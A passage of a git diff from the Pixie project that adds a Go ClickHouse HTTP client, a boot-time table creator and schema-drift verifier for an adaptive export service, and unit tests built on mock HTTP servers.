true, attaches the CH settings that turn silent + // drops into errors (input_format_skip_unknown_fields=0 etc.) — + // see setFailLoudSettings. + FailLoud bool + // Settings carries additional CH settings as URL params on the + // query string. 
Keys are passed through unchanged. + Settings url.Values +} + +// InsertResult is what Insert returns on success. +type InsertResult struct { + // Summary is the X-ClickHouse-Summary response header verbatim (may + // be empty — older CH or middlebox stripping). Callers parse for + // silent-drop detection. + Summary string + // BodyBytes is the count of bytes in the request body (not the + // response). Convenient for logging the wire size at the call site. + BodyBytes int +} + +// Insert posts the body for an INSERT … FORMAT X statement (sql contains +// the statement; body contains the data in the named format). The +// per-call options carry content-type + the fail-loud setting. +func (c *Client) Insert(ctx context.Context, sql string, body []byte, opts InsertOptions) (InsertResult, error) { + q := url.Values{} + q.Set("query", sql) + for k, vs := range opts.Settings { + for _, v := range vs { + q.Add(k, v) + } + } + if opts.FailLoud { + setFailLoudSettings(q) + } + ct := opts.ContentType + if ct == "" { + ct = "application/x-ndjson" + } + out, resp, err := c.doRaw(ctx, http.MethodPost, c.endpoint+"/?"+q.Encode(), bytes.NewReader(body), ct) + if err != nil { + return InsertResult{}, err + } + _ = out // discarded: INSERT bodies are empty + return InsertResult{ + Summary: resp.Header.Get("X-ClickHouse-Summary"), + BodyBytes: len(body), + }, nil +} + +// do is the simple variant used by Exec/Query — it discards the response +// headers and only surfaces the body bytes. +func (c *Client) do(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, error) { + out, _, err := c.doRaw(ctx, method, urlStr, body, contentType) + return out, err +} + +// doRaw builds + sends one request, returning the body and the response +// (so Insert can read the X-ClickHouse-Summary header). Non-2xx becomes a +// formatted Go error. 
+func (c *Client) doRaw(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, *http.Response, error) { + req, err := http.NewRequestWithContext(ctx, method, urlStr, body) + if err != nil { + return nil, nil, err + } + if contentType != "" { + req.Header.Set("Content-Type", contentType) + } + if c.user != "" { + req.SetBasicAuth(c.user, c.pass) + } + resp, err := c.hc.Do(req) + if err != nil { + return nil, nil, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, resp, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg))) + } + out, err := io.ReadAll(resp.Body) + if err != nil { + return nil, resp, err + } + return out, resp, nil +} + +// setFailLoudSettings pins ClickHouse's input-format settings on every +// INSERT so an upstream schema-drift surfaces as an HTTP 4xx with a real +// error body, not a silent written_rows=0 + 200 OK that downstream +// silent-drop detection only catches after the data is lost. +// +// input_format_skip_unknown_fields=0 fail on a column we write that +// doesn't exist in CH. +// input_format_null_as_default=0 fail on a NULL where the +// column is non-nullable. +// input_format_allow_errors_num=0 reject the whole batch on +// the first parse error. +// input_format_allow_errors_ratio=0 same, for the proportional +// knob. +func setFailLoudSettings(q url.Values) { + q.Set("input_format_skip_unknown_fields", "0") + q.Set("input_format_null_as_default", "0") + q.Set("input_format_allow_errors_num", "0") + q.Set("input_format_allow_errors_ratio", "0") +} diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go new file mode 100644 index 00000000000..28664911a14 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go @@ -0,0 +1,184 @@ +// Copyright 2018- The Pixie Authors. 
+// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package chhttp + +import ( + "context" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" +) + +func TestNew_RejectsBadEndpoints(t *testing.T) { + for _, tc := range []struct { + name, ep string + }{ + {"empty", ""}, + {"no-scheme", "localhost:8123"}, + {"unsupported-scheme", "ftp://localhost:8123"}, + {"has-query", "http://localhost:8123/?foo=bar"}, + {"has-fragment", "http://localhost:8123/#bar"}, + } { + t.Run(tc.name, func(t *testing.T) { + if _, err := New(tc.ep, "", "", 0); err == nil { + t.Fatalf("New(%q) = nil err, want error", tc.ep) + } + }) + } +} + +func TestNew_DefaultsTimeout(t *testing.T) { + c, err := New("http://localhost:8123", "", "", 0) + if err != nil { + t.Fatalf("New: %v", err) + } + if c.hc.Timeout != DefaultTimeout { + t.Fatalf("timeout = %v, want %v", c.hc.Timeout, DefaultTimeout) + } +} + +func TestNew_StripsTrailingSlashFromEndpoint(t *testing.T) { + c, err := New("http://localhost:8123/", "", "", 0) + if err != nil { + t.Fatalf("New: %v", err) + } + if c.Endpoint() != "http://localhost:8123" { + t.Fatalf("endpoint = %q, want trimmed", c.Endpoint()) + } +} + +func TestExec_PostsSQLAsBody(t *testing.T) { + var gotBody string + var gotMethod string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotMethod = r.Method + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + 
w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + c, err := New(srv.URL, "", "", time.Second) + if err != nil { + t.Fatalf("New: %v", err) + } + if _, err := c.Exec(context.Background(), "CREATE DATABASE x"); err != nil { + t.Fatalf("Exec: %v", err) + } + if gotMethod != http.MethodPost { + t.Fatalf("method = %q, want POST", gotMethod) + } + if gotBody != "CREATE DATABASE x" { + t.Fatalf("body = %q, want %q", gotBody, "CREATE DATABASE x") + } +} + +func TestQuery_PutsSQLInURLParam(t *testing.T) { + var gotMethod, gotQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotMethod = r.Method + gotQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"hits":1}` + "\n")) + })) + defer srv.Close() + + c, _ := New(srv.URL, "", "", time.Second) + body, err := c.Query(context.Background(), "SELECT 1") + if err != nil { + t.Fatalf("Query: %v", err) + } + if gotMethod != http.MethodGet { + t.Fatalf("method = %q, want GET", gotMethod) + } + if gotQuery != "SELECT 1" { + t.Fatalf("query = %q, want %q", gotQuery, "SELECT 1") + } + if !strings.Contains(string(body), "hits") { + t.Fatalf("body = %q", body) + } +} + +func TestInsert_SetsContentTypeAndFailLoud(t *testing.T) { + var gotCT, gotQ string + gotSettings := map[string]string{} + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotCT = r.Header.Get("Content-Type") + gotQ = r.URL.Query().Get("query") + for _, k := range []string{"input_format_skip_unknown_fields", "input_format_null_as_default", "input_format_allow_errors_num", "input_format_allow_errors_ratio"} { + gotSettings[k] = r.URL.Query().Get(k) + } + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"3"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + c, _ := New(srv.URL, "", "", time.Second) + res, err := c.Insert(context.Background(), + "INSERT INTO t FORMAT JSONEachRow", []byte("{}\n"), + InsertOptions{FailLoud: true}) + if err != 
nil { + t.Fatalf("Insert: %v", err) + } + if gotCT != "application/x-ndjson" { + t.Fatalf("content-type = %q", gotCT) + } + if gotQ != "INSERT INTO t FORMAT JSONEachRow" { + t.Fatalf("query = %q", gotQ) + } + if gotSettings["input_format_skip_unknown_fields"] != "0" { + t.Fatalf("fail-loud not applied: %v", gotSettings) + } + if res.Summary != `{"written_rows":"3"}` { + t.Fatalf("summary = %q", res.Summary) + } + if res.BodyBytes != 3 { + t.Fatalf("body bytes = %d", res.BodyBytes) + } +} + +func TestExec_PropagatesNon2xx(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusBadRequest) + _, _ = w.Write([]byte("syntax error near 'GROOT'")) + })) + defer srv.Close() + c, _ := New(srv.URL, "", "", time.Second) + _, err := c.Exec(context.Background(), "GROOT") + if err == nil || !strings.Contains(err.Error(), "HTTP 400") || !strings.Contains(err.Error(), "syntax error") { + t.Fatalf("err = %v", err) + } +} + +func TestExec_SendsBasicAuth(t *testing.T) { + var gotUser, gotPass string + var hadAuth bool + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotUser, gotPass, hadAuth = r.BasicAuth() + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + c, _ := New(srv.URL, "default", "s3cret", time.Second) + if _, err := c.Exec(context.Background(), "SELECT 1"); err != nil { + t.Fatalf("Exec: %v", err) + } + if !hadAuth || gotUser != "default" || gotPass != "s3cret" { + t.Fatalf("basic auth: had=%v user=%q pass=%q", hadAuth, gotUser, gotPass) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel new file mode 100644 index 00000000000..b83bc98cad7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel @@ -0,0 +1,44 @@ +# Copyright 2018- The Pixie Authors. 
+# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "clickhouse", + srcs = [ + "apply.go", + "ddl.go", + "insert.go", + ], + embedsrcs = ["schema.sql"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/chhttp", + ], +) + +pl_go_test( + name = "clickhouse_test", + srcs = [ + "apply_test.go", + "columns_test.go", + "ddl_test.go", + "insert_test.go", + ], + embed = [":clickhouse"], +) diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go new file mode 100644 index 00000000000..84b3afbbcb0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go @@ -0,0 +1,252 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
// OperatorOwnedTables is the subset of KnownTables the adaptive_export
// operator creates on boot. Kubescape tables (alerts, kubescape_logs)
// are NOT here — they are owned by the soc/tree/clickhouse-lab
// installer.
//
// Order matters, because Apply walks this slice front to back: the
// pixie observation tables come first, the operator's own write targets
// follow, and dx_attack_graph_malicious (a view over dx_attack_graph)
// must stay after dx_attack_graph.
var OperatorOwnedTables = []string{
	// 12 pixie socket_tracer tables — created BEFORE Pixie's retention
	// plugin gets a chance to auto-DDL them (which would omit our
	// namespace + pod columns and break analyst JOINs).
	"http_events",
	"http2_messages.beta",
	"dns_events",
	"redis_events",
	"mysql_events",
	"pgsql_events",
	"cql_events",
	"mongodb_events",
	"kafka_events.beta",
	"amqp_events",
	"mux_events",
	"tls_events",
	// conn_stats — pixie observation table; created in the same boot
	// pass as the others so Apply (here) and Verify (KnownTables in
	// ddl.go) can't drift. The drift was a real regression: aeprod3/4/5
	// shipped with this list at 14 entries while ddl.go's KnownTables
	// had 15, so Apply created 14 tables on fresh install and Verify
	// failed at boot with "conn_stats schema drift, missing columns".
	// Locked down by TestOperatorOwnedTables_CoversAllPixieTables in
	// apply_test.go.
	"conn_stats",
	// The operator's own write targets.
	"adaptive_attribution",
	"trigger_watermark",
	// Per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). Created
	// on boot so a reconcile run has a target without manual DDL. Not a
	// pixie table → not in PixieTables(), so VerifyPixieSchema ignores it.
	"ae_reconcile",
	// dx evidence-graph edge list — created on boot so the Pixie
	// dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real,
	// globally-registered table to read. dx emits edges, AE persists.
	// Not a pixie socket_tracer table → not in PixieTables().
	"dx_attack_graph",
	// Rule-ins-only VIEW over dx_attack_graph; it depends on that table,
	// so it must be created AFTER it.
	"dx_attack_graph_malicious",
}

// Applier applies operator-owned DDL to a ClickHouse cluster over the
// HTTP interface (default port 8123). Used at boot.
type Applier struct {
	c *chhttp.Client // shared ClickHouse HTTP client used for every statement
}

// NewApplier builds an Applier for the given endpoint and credentials.
// Endpoint validation is delegated to chhttp.New, which is called with a
// timeout of 0; any error it returns is wrapped with a "clickhouse: "
// prefix.
func NewApplier(endpoint, user, pass string) (*Applier, error) {
	c, err := chhttp.New(endpoint, user, pass, 0)
	if err != nil {
		return nil, fmt.Errorf("clickhouse: %w", err)
	}
	return &Applier{c: c}, nil
}
+func (a *Applier) Apply(ctx context.Context) error { + if err := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); err != nil { + return fmt.Errorf("apply: create database forensic_db: %w", err) + } + for _, table := range OperatorOwnedTables { + ddl, err := DDL(table) + if err != nil { + return fmt.Errorf("apply: get DDL for %s: %w", table, err) + } + if err := a.execute(ctx, ddl); err != nil { + return fmt.Errorf("apply: create %s: %w", table, err) + } + } + return nil +} + +// WriteAttackGraph inserts dx evidence-graph edges into +// forensic_db.dx_attack_graph. jsonEachRow is newline-delimited JSON objects +// whose keys are the column names (JSONEachRow; unknown keys are skipped, +// missing columns default). No-op on empty input. +func (a *Applier) WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error { + if len(jsonEachRow) == 0 { + return nil + } + _, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_attack_graph FORMAT JSONEachRow", + jsonEachRow, chhttp.InsertOptions{}) + return err +} + +// execute is the DDL primitive — used by Apply for CREATE statements. +func (a *Applier) execute(ctx context.Context, sql string) error { + _, err := a.c.Exec(ctx, sql) + return err +} + +// SchemaDriftError is returned by VerifyPixieSchema when a pixie +// observation table is missing one or more of the operator-required +// columns. errors.Is-friendly. +type SchemaDriftError struct { + Table string + Missing []string +} + +func (e *SchemaDriftError) Error() string { + return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s", + e.Table, strings.Join(e.Missing, ", ")) +} + +// requiredPixieColumns are the columns every pixie observation table +// MUST have for adaptive_attribution JOINs to work. namespace + pod are +// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own +// canonical columns we depend on. 
+var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"} + +// VerifyPixieSchema queries system.columns for each pixie observation +// table and confirms EVERY column AE writes for that table is present +// in CH. This is the **writer ⇔ schema contract** test (the T1 in +// the operator's PR #47 schema-loss report on 2026-06-07). +// +// The earlier shape of this function only checked the 4 +// operator-required columns (namespace/pod/hostname/time_) — a table +// could be hand-created with those four plus a different subset of +// data columns and pass verification, while AE's writer would post +// JSON containing the column names schema.sql says the table should +// have. The result on rig 6a25c85c: CH silently dropped 22 of 24 +// columns into nothing because they were "unknown fields" +// (input_format_skip_unknown_fields default = 1), AE's +// summaryWroteFewerThan saw written_rows=0 / rows_sent=259 only AFTER +// the data was lost, and the controller hot-looped on the rejection. +// +// The expanded contract: for every table in PixieTables(), CH's +// actual column set must be a superset of clickhouse.Columns(table) — +// i.e. the canonical column list parsed out of schema.sql, which IS +// the single source of truth. +// +// Returns the FIRST drift detected as *SchemaDriftError. Callers +// usually want to log loudly and refuse to start so the misconfig +// is visible — silently continuing leaves the table with a schema +// the AE writer can't actually populate. +func (a *Applier) VerifyPixieSchema(ctx context.Context) error { + for _, table := range PixieTables() { + actual, err := a.tableColumns(ctx, table) + if err != nil { + return fmt.Errorf("verify %s: %w", table, err) + } + // The canonical column shape AE expects (schema.sql). + want, err := Columns(table) + if err != nil { + return fmt.Errorf("verify %s: load expected columns: %w", table, err) + } + // Operator-required + canonical union, deduped. 
+ need := make([]string, 0, len(want)+len(requiredPixieColumns)) + seen := map[string]bool{} + for _, c := range want { + if !seen[c] { + seen[c] = true + need = append(need, c) + } + } + for _, c := range requiredPixieColumns { + if !seen[c] { + seen[c] = true + need = append(need, c) + } + } + var missing []string + for _, w := range need { + if !contains(actual, w) { + missing = append(missing, w) + } + } + if len(missing) > 0 { + return &SchemaDriftError{Table: table, Missing: missing} + } + } + return nil +} + +// tableColumns lists the column names of forensic_db.
as +// reported by system.columns. +func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) { + body, err := a.c.Query(ctx, fmt.Sprintf( + "SELECT name FROM system.columns WHERE database='forensic_db' AND table=%s FORMAT JSONEachRow", + quoteCH(table))) + if err != nil { + return nil, err + } + type row struct { + Name string `json:"name"` + } + var out []string + for _, line := range bytes.Split(body, []byte{'\n'}) { + line = bytes.TrimSpace(line) + if len(line) == 0 { + continue + } + var r row + if err := json.Unmarshal(line, &r); err != nil { + return nil, fmt.Errorf("parse system.columns row: %w", err) + } + out = append(out, r.Name) + } + return out, nil +} + +func quoteCH(s string) string { + r := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s) + return "'" + r + "'" +} + +func contains(s []string, x string) bool { + for _, v := range s { + if v == x { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go new file mode 100644 index 00000000000..e108e05540c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go @@ -0,0 +1,266 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "context" + "errors" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "sync/atomic" + "testing" +) + +// TestApply_ExecutesEveryOperatorOwnedTable — Apply POSTs one DDL per +// table in OperatorOwnedTables, in order. None of the kubescape tables +// (alerts, kubescape_logs) are touched — those belong to the soc installer. +func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) { + var mu sync.Mutex + var bodies []string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + b, _ := io.ReadAll(r.Body) + mu.Lock() + bodies = append(bodies, string(b)) + mu.Unlock() + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err != nil { + t.Fatalf("Apply: %v", err) + } + // 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls. + if got, want := len(bodies), len(OperatorOwnedTables)+1; got != want { + t.Fatalf("Apply made %d calls, want %d", got, want) + } + if !strings.Contains(bodies[0], "CREATE DATABASE IF NOT EXISTS forensic_db") { + t.Fatalf("first DDL must create the database; got: %s", bodies[0]) + } + // Spot-check that the SECOND call is for the first OperatorOwnedTables entry, + // and that the LAST call is for the last OperatorOwnedTables entry (robust to + // new operator-owned tables being appended, e.g. dx_attack_graph). + if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) { + t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1]) + } + lastTable := OperatorOwnedTables[len(OperatorOwnedTables)-1] + if !strings.Contains(bodies[len(bodies)-1], "forensic_db."+lastTable) { + t.Fatalf("last DDL not for %s; got: %s", lastTable, bodies[len(bodies)-1]) + } + // And ensure no kubescape DDL leaked through. 
+ for _, b := range bodies { + if strings.Contains(b, "forensic_db.alerts") || strings.Contains(b, "forensic_db.kubescape_logs") { + t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", b) + } + } +} + +// TestApply_FailsFastOnHTTPError — if any CREATE returns non-2xx, +// Apply returns immediately without attempting later tables. +func TestApply_FailsFastOnHTTPError(t *testing.T) { + // atomic.Int32 because httptest's handler runs on its own goroutine + // while the test goroutine reads `calls` after Apply returns — + // without atomic the -race detector flags a data race even though + // the goroutines are happens-before-ordered by Apply's HTTP response. + var calls atomic.Int32 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := calls.Add(1) + if n == 1 { + w.WriteHeader(500) + _, _ = w.Write([]byte("ddl exploded")) + return + } + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err == nil { + t.Fatalf("expected error from Apply on HTTP 500") + } + if got := calls.Load(); got != 1 { + t.Fatalf("Apply continued past first failure; calls = %d", got) + } +} + +// tableForQuery extracts the table name from a system.columns query +// like "...AND table='http_events' FORMAT JSONEachRow". +func tableForQuery(q string) string { + const marker = "table='" + i := strings.Index(q, marker) + if i < 0 { + return "" + } + rest := q[i+len(marker):] + j := strings.Index(rest, "'") + if j < 0 { + return "" + } + return rest[:j] +} + +// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard. +// On rig 6a25c85c (PR #47 schema-loss report), http_events was created +// by a hand-maintained stopgap that DIDN'T include req_path / +// req_headers / etc. — the columns AE's writer puts into JSONEachRow +// posts. 
The old VerifyPixieSchema only checked namespace/pod/hostname/ +// time_, so it passed; the writer's 22 unknown fields then got silently +// dropped by CH at default settings. The expanded contract verifies +// EVERY column AE expects per table is present in CH (the writer ⇔ +// schema contract). This test reproduces the rig 6a25c85c shape: +// http_events comes back with the 4 operator-required columns but +// missing the data columns the writer fills. +func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Return only the operator-required columns for the first pixie + // table iterated; that's the regression shape — looks "valid" + // to the old checker but fails the writer-column union. + table := tableForQuery(r.URL.Query().Get("query")) + if table == "http_events" { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + return + } + // Other tables (won't be reached) — fully populated. + cols, _ := Columns(table) + for _, c := range cols { + fmt.Fprintf(w, "{\"name\":%q}\n", c) + } + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + err = a.VerifyPixieSchema(context.Background()) + if err == nil { + t.Fatalf("expected SchemaDriftError; got nil") + } + var drift *SchemaDriftError + if !errors.As(err, &drift) { + t.Fatalf("err type = %T, want *SchemaDriftError", err) + } + if drift.Table != "http_events" { + t.Fatalf("first drift = %q, want http_events", drift.Table) + } + // Spot-check that several of the data columns the writer fills are + // flagged missing — that's the new coverage vs the old 4-column + // check. 
+ for _, want := range []string{"req_path", "req_headers", "resp_status", "latency"} { + if !contains(drift.Missing, want) { + t.Errorf("Missing should include %q (writer-column drift); got %v", want, drift.Missing) + } + } +} + +// TestVerifyPixieSchema_AllPresent — happy path. The mock server returns +// the FULL schema.sql column shape for each table, so VerifyPixieSchema +// confirms the writer ⇔ schema contract holds and returns nil. +func TestVerifyPixieSchema_AllPresent(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + table := tableForQuery(r.URL.Query().Get("query")) + cols, err := Columns(table) + if err != nil { + http.Error(w, err.Error(), 500) + return + } + for _, c := range cols { + fmt.Fprintf(w, "{\"name\":%q}\n", c) + } + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.VerifyPixieSchema(context.Background()); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} + +// TestNewApplier_RejectsBadEndpoint — defensive contract. +func TestNewApplier_RejectsBadEndpoint(t *testing.T) { + if _, err := NewApplier("", "", ""); err == nil { + t.Fatalf("empty endpoint not rejected") + } + if _, err := NewApplier("http://%zz", "", ""); err == nil { + t.Fatalf("malformed endpoint not rejected") + } +} + +// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard: +// the operator never owns kubescape tables. +func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) { + for _, x := range []string{"alerts", "kubescape_logs"} { + if contains(OperatorOwnedTables, x) { + t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", x) + } + } +} + +// TestOperatorOwnedTables_TrailingOperatorTables — ordering guard. 
+// pixie observation tables come first (so they exist before the retention +// plugin can auto-DDL them with the wrong schema), then the operator's +// own write targets in declared order. +func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) { + want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph", "dx_attack_graph_malicious"} + got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):] + for i, w := range want { + if got[i] != w { + t.Fatalf("OperatorOwnedTables tail = %v, want %v", got, want) + } + } +} + +// TestOperatorOwnedTables_CoversAllPixieTables — drift guard between the +// boot-time Apply (OperatorOwnedTables, this file) and the verify path +// that uses ddl.go's KnownTables / PixieTables. aeprod3/4/5 shipped with +// the two lists out of sync: ddl.go's PixieTables() included "conn_stats" +// (re-added in commit a54a1f6d3) but OperatorOwnedTables +// did not, so Apply created 14 tables and Verify expected 15 — AE fatal'd +// at boot with `pixie table schema drift detected … conn_stats schema +// drift, missing columns`. Anyone adding a new pixie observation table in +// the future MUST add it to both lists; this test fails loudly otherwise. 
+func TestOperatorOwnedTables_CoversAllPixieTables(t *testing.T) { + owned := map[string]bool{} + for _, n := range OperatorOwnedTables { + owned[n] = true + } + var missing []string + for _, p := range PixieTables() { + if !owned[p] { + missing = append(missing, p) + } + } + if len(missing) > 0 { + t.Fatalf("PixieTables() not covered by OperatorOwnedTables: %v "+ + "(adding a pixie table requires updating BOTH apply.go OperatorOwnedTables "+ + "and ddl.go KnownTables+PixieTables — drift causes the boot-time schema "+ + "verify to fail with \"missing columns\")", missing) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go new file mode 100644 index 00000000000..2e3a94bfb73 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go @@ -0,0 +1,130 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "reflect" + "strings" + "testing" +) + +// http_events is the shape AE writes most often (and the bench shape). +// Pin the exact ordered column list so a schema.sql edit that drops or +// reorders a column trips this test loudly. 
+func TestColumns_http_events_ExactList(t *testing.T) { + got, err := Columns("http_events") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "time_", "upid", "namespace", "pod", + "remote_addr", "remote_port", "local_addr", "local_port", + "trace_role", "encrypted", "major_version", "minor_version", + "content_type", "req_headers", "req_method", "req_path", + "req_body", "req_body_size", "resp_headers", "resp_status", + "resp_message", "resp_body", "resp_body_size", "latency", + "hostname", "event_time", + } + if !reflect.DeepEqual(got, want) { + t.Fatalf("Columns(http_events) mismatch:\n got=%v\nwant=%v", got, want) + } +} + +// conn_stats is the column shape pinned by the rev-2 schema; if anyone +// drops or renames a column the bench-encoder fast-path would silently +// emit the wrong JSON, so this guard is mandatory. +func TestColumns_conn_stats_ExactList(t *testing.T) { + got, err := Columns("conn_stats") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "time_", "upid", "namespace", "pod", + "remote_addr", "remote_port", "trace_role", "addr_family", + "protocol", "ssl", "conn_open", "conn_close", "conn_active", + "bytes_sent", "bytes_recv", "hostname", "event_time", + } + if !reflect.DeepEqual(got, want) { + t.Fatalf("Columns(conn_stats) mismatch:\n got=%v\nwant=%v", got, want) + } +} + +// Every table in PixieTables() must successfully parse, and each must +// include the operator-mandated namespace + pod columns plus the +// retention-plugin-mandated hostname + event_time columns. 
+func TestColumns_AllPixieTables_HaveOperatorColumns(t *testing.T) { + for _, table := range PixieTables() { + cols, err := Columns(table) + if err != nil { + t.Errorf("Columns(%q): %v", table, err) + continue + } + for _, required := range []string{"namespace", "pod", "hostname", "event_time"} { + found := false + for _, c := range cols { + if c == required { + found = true + break + } + } + if !found { + t.Errorf("Columns(%q) missing required column %q (cols=%v)", table, required, cols) + } + } + } +} + +// Backtick-quoted (dotted) tables also resolve. +func TestColumns_DottedTables(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + got, err := Columns(table) + if err != nil { + t.Errorf("Columns(%q): %v", table, err) + continue + } + if len(got) == 0 { + t.Errorf("Columns(%q): empty", table) + } + } +} + +// Unknown tables return ErrUnknownTable so callers (sink) can fall +// back to the encoding/json slow path safely. +func TestColumns_UnknownTable_ErrUnknownTable(t *testing.T) { + _, err := Columns("not_a_real_table") + if err == nil || 